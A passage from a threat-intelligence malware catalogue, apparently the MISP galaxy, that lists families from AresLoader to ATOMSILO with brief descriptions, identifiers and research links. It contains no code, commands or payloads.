AresLoader is a new malware "downloader" that has been advertised on some Russian language Dark Web forums, "RAMP" and "XSS", by a threat actor called "DarkBLUP". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”
The loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:
- Written in C/C++
- Supports 64-bit payloads
- Makes it look like malware spawned by another process
- Prevents non-Microsoft signed binaries from being injected into malware
- Hides suspicious imported Windows APIs
- Leverages anti-analysis techniques to avoid reverse engineering
Furthermore, it was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.
Internal MISP references
UUID 1bd6c2ab-341e-43e1-90ca-2e7509828268
which can be used as unique global reference for AresLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader - webarchive
- https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/ - webarchive
- https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html - webarchive
- https://flashpoint.io/blog/private-malware-for-sale-aresloader/ - webarchive
- https://twitter.com/k3dg3/status/1636873721200746496 - webarchive
- https://intel471.com/blog/new-loader-on-the-bloc-aresloader - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ArguePatch
During a campaign against a Ukrainian energy provider, a new loader of a new version of CaddyWiper called "ArguePatch" was observed by ESET researchers. ArguePatch is a modified version of Hex-Ray's Remote Debugger Server (win32_remote.exe). ArguePatch expects a decryption key and the file of the CaddyWiper shellcode as command line parameters.
Internal MISP references
UUID e9b4bec3-ad18-49cc-b6af-c0ffcc283153
which can be used as unique global reference for ArguePatch
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aria-body
Internal MISP references
UUID 5fa1c068-8e73-4930-b6fe-8c92c6357df6
which can be used as unique global reference for Aria-body
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody - webarchive
- https://medium.com/insomniacs/aria-body-loader-is-that-you-53bdd630f8a1 - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf - webarchive
- https://securelist.com/it-threat-evolution-q2-2020/98230 - webarchive
- https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/ - webarchive
- https://cocomelonc.github.io/malware/2023/09/25/malware-trick-36.html - webarchive
- https://securelist.com/naikons-aria/96899/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Arid Gopher
This malware is a Go-written variant of Micropsia and, according to DeepInstinct, it is still in development.
Internal MISP references
UUID 2037d9f1-bf2a-44e1-b04f-98fe3f961381
which can be used as unique global reference for Arid Gopher
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher - webarchive
- https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/ - webarchive
- https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AridHelper
Helper malware associated with AridGopher, which will provide an alternative persistence mechanism in case "360 total security" is found on a target system.
Internal MISP references
UUID 6bd3759f-5961-423d-9437-c67bddcda458
which can be used as unique global reference for AridHelper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Arik Keylogger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Arik Keylogger.
Known Synonyms |
---|
Aaron Keylogger |
Internal MISP references
UUID 3572d725-bf13-43ef-9511-bdbb7692ab06
which can be used as unique global reference for Arik Keylogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Arkei Stealer
Arkei is a stealer that appeared around May 2018. It collects data about browsers (saved passwords and autofill forms) and cryptocurrency wallets, and steals files matching an attacker-defined pattern. It then exfiltrates everything in a zip file uploaded to the attacker's panel. Later, it was forked and used as a base to create Vidar stealer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Arkei Stealer.
Known Synonyms |
---|
ArkeiStealer |
Internal MISP references
UUID 59eff508-7f26-4fd8-b526-5772a9f3d9a6
which can be used as unique global reference for Arkei Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer - webarchive
- https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/ - webarchive
- https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/ - webarchive
- https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets - webarchive
- https://isc.sans.edu/diary/rss/28468 - webarchive
- https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer - webarchive
- https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://threatmon.io/arkei-stealer-analysis-threatmon/ - webarchive
- https://m4lcode.github.io/malware%20analysis/vidar/ - webarchive
- https://forensicitguy.github.io/analyzing-stealer-msi-using-msitools/ - webarchive
- https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468 - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ArrowRAT
It is available as a service, purchasable by anyone to use in their own campaigns. Its features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module, which essentially gives an attacker full remote access with minimal need for technical knowledge to use it.
Internal MISP references
UUID 3d5608dc-1e0d-40cb-8a17-3a8d7efb1c53
which can be used as unique global reference for ArrowRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ARS VBS Loader
ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which in turn seems to be based on SafeLoader.
Internal MISP references
UUID 1a4f99cc-c078-41f8-9749-e1dc524fc795
which can be used as unique global reference for ARS VBS Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader - webarchive
- https://twitter.com/Racco42/status/1001374490339790849 - webarchive
- https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/ - webarchive
- https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ARTFULPIE
Internal MISP references
UUID bc0ad216-9b56-489e-858d-68522e1fdfaf
which can be used as unique global reference for ARTFULPIE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Artra Downloader
Internal MISP references
UUID 05de9c50-5958-4d02-b1a0-c4a2367c2d22
which can be used as unique global reference for Artra Downloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.artra - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf - webarchive
- https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html - webarchive
- https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/ - webarchive
- https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/ - webarchive
- https://www.freebuf.com/articles/database/192726.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Asbit
Internal MISP references
UUID 488b735f-9138-4970-9d20-77132f4a82d6
which can be used as unique global reference for Asbit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AscentLoader
Internal MISP references
UUID 4e3fa4e6-bc7d-4024-b191-ccafa5347c13
which can be used as unique global reference for AscentLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ASPC
Internal MISP references
UUID bc128d41-33e6-40ec-aaf2-9a05da9a0a27
which can be used as unique global reference for ASPC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Asprox
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Asprox.
Known Synonyms |
---|
Aseljo |
BadSrc |
Internal MISP references
UUID ba557993-f64e-4538-8f13-dafaa3c0db00
which can be used as unique global reference for Asprox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox - webarchive
- https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign - webarchive
- http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Asruex
Internal MISP references
UUID a51595aa-a399-4332-a14d-a378bae609e7
which can be used as unique global reference for Asruex
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex - webarchive
- https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Astaroth
First spotted in the wild in 2017, Astaroth is a highly prevalent, information-stealing Latin American banking trojan. It is written in Delphi and has some innovative execution and attack techniques. Originally, this malware variant targeted Brazilian users, but Astaroth now targets users both in North America and Europe.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Astaroth.
Known Synonyms |
---|
Guildma |
Internal MISP references
UUID 0cdb83dd-106b-458e-8d04-ca864281e06e
which can be used as unique global reference for Astaroth
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth - webarchive
- https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf - webarchive
- https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research - webarchive
- https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ - webarchive
- https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962 - webarchive
- https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/ - webarchive
- https://www.trendmicro.com/en_us/research/24/j/water-makara-uses-obfuscated-javascript-in-spear-phishing-campai.html - webarchive
- https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ - webarchive
- https://isc.sans.edu/diary/27482 - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://blog.talosintelligence.com/2020/05/astaroth-analysis.html - webarchive
- https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/ - webarchive
- https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.easysol.net/meet-lucifer-international-trojan/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/ - webarchive
- https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Astasia
Astasia is a banking trojan that spreads through phishing emails that contain an executable attachment. Once the attachment is executed, Astasia downloads and installs a trojan that runs in the background. The trojan can steal personal information, such as passwords and credit card numbers, from victims.
Internal MISP references
UUID 6cc38bdd-f7ac-4775-bc41-69e72b761ab5
which can be used as unique global reference for Astasia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AstraLocker
Internal MISP references
UUID d32a6790-57c7-4985-b6e0-5b73f025fb43
which can be used as unique global reference for AstraLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker - webarchive
- https://blog.malwarebytes.com/ransomware/2022/07/astralocker-2-0-ransomware-isnt-going-to-give-you-your-files-back/ - webarchive
- https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs - webarchive
- https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/ - webarchive
- https://www.emsisoft.com/ransomware-decryption-tools/astralocker - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AsyncRAT
AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as keylogging, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Internal MISP references
UUID c94c4f23-20d1-4858-8f94-01a54b213981
which can be used as unique global reference for AsyncRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://community.riskiq.com/article/ade260c6 - webarchive
- https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers - webarchive
- https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services - webarchive
- https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/ - webarchive
- https://threatpost.com/ta2541-apt-rats-aviation/178422/ - webarchive
- https://labs.k7computing.com/?p=21759 - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://blog.morphisec.com/syk-crypter-discord - webarchive
- https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat - webarchive
- https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/ - webarchive
- https://censys.com/a-beginners-guide-to-tracking-malware-infrastructure/ - webarchive
- https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/ - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection - webarchive
- https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf - webarchive
- https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service - webarchive
- https://embee-research.ghost.io/unpacking-malware-using-process-hacker-and-memory-inspection/ - webarchive
- https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/ - webarchive
- https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/ - webarchive
- https://www.linkedin.com/feed/update/urn
activity:7252248385007603713/ - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/ - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns - webarchive
- https://twitter.com/ESETresearch/status/1449132020613922828 - webarchive
- https://blog.cyber5w.com/analyzing-macro-enabled-office-documents - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign - webarchive
- https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf - webarchive
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution - webarchive
- https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/ - webarchive
- https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader - webarchive
- https://mssplab.github.io/threat-hunting/2023/05/19/malware-src-asyncrat.html - webarchive
- https://twitter.com/vxunderground/status/1519632014361640960 - webarchive
- https://axmahr.github.io/posts/asyncrat-detection/ - webarchive
- https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat - webarchive
- https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/# - webarchive
- https://blog.netlab.360.com/purecrypter - webarchive
- https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html - webarchive
- https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages - webarchive
- https://aidenmitchell.ca/asyncrat-via-vbs/ - webarchive
- https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://twitter.com/MsftSecIntel/status/1392219299696152578 - webarchive
- https://community.riskiq.com/article/24759ad2 - webarchive
- https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html - webarchive
- https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/ - webarchive
- https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/ - webarchive
- https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html - webarchive
- https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise - webarchive
- https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf - webarchive
- https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://www.linkedin.com/feed/update/urn
activity:7137086303329783808/ - webarchive
- https://github.com/jeFF0Falltrades/rat_king_parser - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html - webarchive
- https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html - webarchive
- https://embeeresearch.io/unpacking-net-malware-with-process-hacker/ - webarchive
- https://www.esentire.com/blog/asyncrat-activity - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/ - webarchive
- https://embee-research.ghost.io/unpacking-net-malware-with-process-hacker/ - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies - webarchive
- https://www.secureworks.com/research/darktortilla-malware-analysis - webarchive
- https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://eln0ty.github.io/malware%20analysis/asyncRAT/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1209.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.gatewatcher.com/en/lab/zip-files-make-it-bigger-to-avoid-edr-detection/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html - webarchive
- https://dfir.ch/posts/asyncrat_quasarrat/ - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper - webarchive
- https://embeeresearch.io/unpacking-malware-using-process-hacker-and-memory-inspection/ - webarchive
- https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno - webarchive
- https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/ - webarchive
- https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/ - webarchive
- https://community.riskiq.com/article/3929ede0/description - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Atharvan
Internal MISP references
UUID b1ff6117-7dd2-4328-bde8-00d74584fc98
which can be used as unique global reference for Atharvan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Athena
Part of the Mythic framework; a payload written in C# (.NET 6) that supports HTTP, WebSockets, Slack and SMB for C2.
Internal MISP references
UUID 69bcd272-e69e-4548-bb8e-05eedcc3f13e
which can be used as unique global reference for Athena
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AthenaGo RAT
Internal MISP references
UUID 587eff78-47be-4022-a1b5-7857340a9ab2
which can be used as unique global reference for AthenaGo RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ATI-Agent
Internal MISP references
UUID e248d80d-de8e-45de-b6d0-3740e5b34573
which can be used as unique global reference for ATI-Agent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Atlantida
Internal MISP references
UUID 4c7d243d-ffbe-4fc4-afe3-0961ba99e2b0
which can be used as unique global reference for Atlantida
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AtlasAgent
Internal MISP references
UUID 2fa8f479-63c3-4f91-954a-f30a50d2ad6e
which can be used as unique global reference for AtlasAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ATMii
Internal MISP references
UUID f2a7c867-6380-4cbe-b524-50727a29f0c6
which can be used as unique global reference for ATMii
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ATMitch
Internal MISP references
UUID 5f427b3a-7162-4421-b2cd-e6588d518448
which can be used as unique global reference for ATMitch
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch - webarchive
- https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/ - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf - webarchive
- https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Atmosphere
Internal MISP references
UUID 15918921-93b8-4b3a-a612-e1d1f769c420
which can be used as unique global reference for Atmosphere
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ATMSpitter
The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll. Both libraries are legitimate Windows drivers used to interact with the components of different ATM models.
Internal MISP references
UUID 5a03a6ff-e127-4cd2-aab1-75f1e3ecc187
which can be used as unique global reference for ATMSpitter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter - webarchive
- https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ATOMSILO
According to PCrisk, AtomSilo is a type of malware that blocks access to files by encrypting them and renames every encrypted file by appending the ".ATOMSILO" extension to its filename. It renames "1.jpg" to "1.jpg.ATOMSILO", "2.jpg" to "2.jpg.ATOMSILO", and so on. As its ransom note, AtomSilo creates the "README-FILE-#COMPUTER-NAME#-#CREATION-TIME#.hta" file.
Internal MISP references
UUID f47633fb-2c2b-46c3-a1e6-2204d56897b8
which can be used as unique global reference for ATOMSILO
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.zscaler.com/blogs/security-research/atomsilo-ransomware-enters-league-double-extortion - webarchive
- https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/ - webarchive
- https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/ - webarchive
- https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://twitter.com/siri_urz/status/1437664046556274694?s=20 - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Attor
